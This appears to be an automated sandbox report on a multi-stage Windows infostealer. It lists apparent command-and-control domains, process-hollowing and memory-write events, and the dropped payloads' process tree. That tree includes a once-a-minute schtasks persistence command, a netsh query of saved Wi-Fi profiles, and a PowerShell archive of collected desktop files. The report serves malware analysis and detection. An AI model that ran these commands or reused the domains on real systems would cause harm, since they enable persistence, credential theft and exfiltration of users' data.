Source: gold.exe, 00000011.00000002.2298653868.0000000003815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: suitcaseacanehalk.shop
Source: gold.exe, 00000011.00000002.2298653868.0000000003815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: absentconvicsjawun.shop
Source: gold.exe, 00000011.00000002.2298653868.0000000003815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: pushjellysingeywus.shop
Source: gold.exe, 00000011.00000002.2298653868.0000000003815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: economicscreateojsu.shop
Source: gold.exe, 00000011.00000002.2298653868.0000000003815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: entitlementappwo.shop
Source: swiiiii.exe, 0000001B.00000002.2873997217.0000000003855000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: pillowbrocccolipe.shop
Source: swiiiii.exe, 0000001B.00000002.2873997217.0000000003855000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: communicationgenerwo.shop
Source: swiiiii.exe, 0000001B.00000002.2873997217.0000000003855000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: diskretainvigorousiw.shop
Source: swiiiii.exe, 0000001B.00000002.2873997217.0000000003855000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: affordcharmcropwo.shop
Source: swiiiii.exe, 0000001B.00000002.2873997217.0000000003855000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: dismissalcylinderhostw.shop
Source: swiiiii.exe, 0000001B.00000002.2873997217.0000000003855000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: enthusiasimtitleow.shop
Source: swiiiii.exe, 0000001B.00000002.2873997217.0000000003855000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: worryfillvolcawoi.shop
Source: swiiiii.exe, 0000001B.00000002.2873997217.0000000003855000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cleartotalfisherwo.shop

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base address: 400000
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 58E000
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 590000
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C4A008
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44A000
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D3C008
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 439000
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 447000
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: EE7008
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 404000
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 406000
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: CEA008
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 404000
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 406000
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 96C008

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe "C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe "C:\Users\user\AppData\Local\Temp\1001053001\gold.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe "C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe" /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe "C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Users\user\AppData\Local\Temp\1001084001\random.exe "C:\Users\user\AppData\Local\Temp\1001084001\random.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe "C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe "C:\Users\user\AppData\Local\Temp\1001107001\jok.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\configurationValue\propro.exe "C:\Users\user\AppData\Roaming\configurationValue\propro.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe "C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe"
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe" /F
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Process created: C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe "C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe"
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Process created: C:\Users\user\AppData\Local\Temp\1000188001\ISetup8.exe "C:\Users\user\AppData\Local\Temp\1000188001\ISetup8.exe"
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Process created: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe "C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe"
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Process created: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe "C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe"
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000188001\ISetup8.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000188001\ISetup8.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown

Source: bUWKfj04aU.exe, bUWKfj04aU.exe, 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Program Manager
Source: Traffic.exe, 0000000F.00000002.2321334601.0000000002821000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: GetProgmanWindow
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	Binary or memory string: ..\..\opera\desktop\chrome_imports\chrome\browser\win\ui_automation_util.ccGetCachedBstrValue property is not a BSTR: GetCachedInt32Value property is not an I4: X64Cannot get the size of file version infoNo file version in the package\StringFileInfo\000004B0\ProductVersionNo product version value in the packageReceived an invalid version: \StringFileInfo\000004B0\ContinuousVersionReceived an invalid continuous build number: Cannot acquire internal version from the full version: \StringFileInfo\000004B0\StreamNo stream value in the packageCannot get exe output: version..\..\opera\desktop\windows\installer\common\file_version_utils_impl.ccInvalid version from exe: Cannot get exe output: streamCannot get app output Failed to run the elevated process: Failed wait for the elevated process: Unexpected result when waiting for elevated process: Shortcut element - no correct interface...\..\opera\desktop\windows\installer\common\pin_automator.ccDoneCannot get native menu handle.Cannot get desktop rect.Cannot find pin menu element.No rectangleCould not activate the menu item.ProgmanSysListView324
Source: ISetup8.exe, 00000023.00000003.3016446842.000000000585C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TrayNotifyWndShell_TrayWnd
Source: ISetup8.exe, 00000023.00000003.3016446842.000000000585C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32SVWU
Source: ISetup8.exe, 00000023.00000003.3016446842.000000000585C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32S
Source: Traffic.exe, 0000000F.00000002.2321334601.0000000002821000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SetProgmanWindow

Source: C:\Users\user\Desktop\bUWKfj04aU.exe

Code function: 0_2_008DCD47 cpuid

0_2_008DCD47

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001084001\random.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001084001\random.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001108001\swiiii.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001108001\swiiii.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001142001\DocuWorks.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001142001\DocuWorks.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001152001\DocuWorks.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001152001\DocuWorks.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.xlsx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\IPKGELNTQY.docx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\IPKGELNTQY.xlsx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\LSBIHQFDVT.xlsx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\NEBFQQYWPS.docx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\SFPUSAFIOL.docx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
